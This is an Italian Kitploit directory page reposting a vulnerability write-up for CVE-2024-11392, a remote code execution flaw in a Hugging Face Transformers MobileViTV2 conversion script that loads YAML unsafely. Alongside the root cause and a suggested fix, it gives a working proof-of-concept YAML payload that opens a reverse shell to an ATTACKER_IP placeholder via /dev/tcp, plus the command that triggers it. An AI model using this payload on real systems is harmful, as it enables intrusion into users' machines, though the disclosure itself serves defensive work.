Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-11392 — Dettagli tecnici e Exploit per CVE-2024-11392 | Kitploit
Strumenti/GitHubGitHub/piyush-bhor/cve-2024-11392
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebApprendimento e FormazioneSviluppo Payload
GitHubpiyush-bhor/cve-2024-11392

CVE-2024-11392

Dettagli tecnici e Exploit per CVE-2024-11392

Vedi Repository
61 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-11392

Vulnerabilità di esecuzione di codice in remoto tramite deserializzazione di dati non affidabili in Hugging Face Transformers MobileViTV2

Panoramica ad alto livello ed effetti della vulnerabilità: La vulnerabilità consente a un attaccante di eseguire codice arbitrario sulla macchina ospitante fornendo un file di configurazione malevolo allo script convert_mlcvnets_to_pytorch.py presente nel repository Hugging Face Transformers. Se un utente ignaro utilizza un modello di terze parti accompagnato da un file di configurazione malevolo, l'esecuzione dello script convert_mlcvnets_to_pytorch.py porterà all'esecuzione di codice in remoto (RCE) sul sistema della vittima.

Il prodotto vulnerabile

  • Prodotto: Hugging Face Transformers
  • Modulo: MobileViTV2
  • File: transformers/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py
  • Versione: Ultima
  • Permalink GitHub: https://github.com/huggingface/transformers/blob/bdb9106f247fca48a71eb384be25dbbd29b065a8/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py

Analisi della causa principale

  • Descrizione dettagliata della vulnerabilità: La vulnerabilità deriva da una deserializzazione non sicura di dati non affidabili. Lo script utilizza la funzione con il loader , che carica l'intero linguaggio YAML ed è vulnerabile all'esecuzione di codice.

Scarica lo strumento
yaml.load
FullLoader
  • Flusso del codice dall'input alla condizione vulnerabile:

    1. L'utente scarica un modello ml-cvnet di terze parti insieme al suo file di configurazione.
    2. L'utente esegue lo script convert_mlcvnets_to_pytorch.py e gli passa il file di configurazione.
    3. Lo script convert_mlcvnets_to_pytorch.py deserializza il file di configurazione ed esegue il codice malevolo.
  • Punto di iniezione: La vulnerabilità si verifica nel punto in cui viene chiamato yaml.load(yaml_file, Loader=yaml.FullLoader). Permalink GitHub: https://github.com/huggingface/transformers/blob/bdb9106f247fca48a71eb384be25dbbd29b065a8/src/transformers/models/mobilevitv2/convert_mlcvnets_to_pytorch.py#L57

  • Correzioni suggerite: Sostituire yaml.load(yaml_file, Loader=yaml.FullLoader) con yaml.safe_load(yaml_file) per impedire l'esecuzione di codice arbitrario.

  • Istruzioni per l'esecuzione della proof-of-concept:

    1. Creare un file di configurazione yaml malevolo transformers_exploit.yaml che aprirà una shell inversa sul sistema della vittima:
    root@kitploit:~
    !!python/object/new:type
    args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
    listitems: "__import__('os').system('bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1')"
    
    1. Eseguire lo script convert_mlcvnets_to_pytorch.py e passare il file transformers_exploit.yaml a --orig_config_path:
    root@kitploit:~
    > python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --orig_config_path transformers_exploit.yaml --pytorch_dump_folder_path dummy_output --task imagenet1k_256
    

    Nota: dummy_checkpoint.pt può essere lasciato come file vuoto, dummy_output come directory vuota e task come una qualsiasi delle opzioni menzionate nello script.

    Link per il download del software: https://github.com/huggingface/transformers/tree/main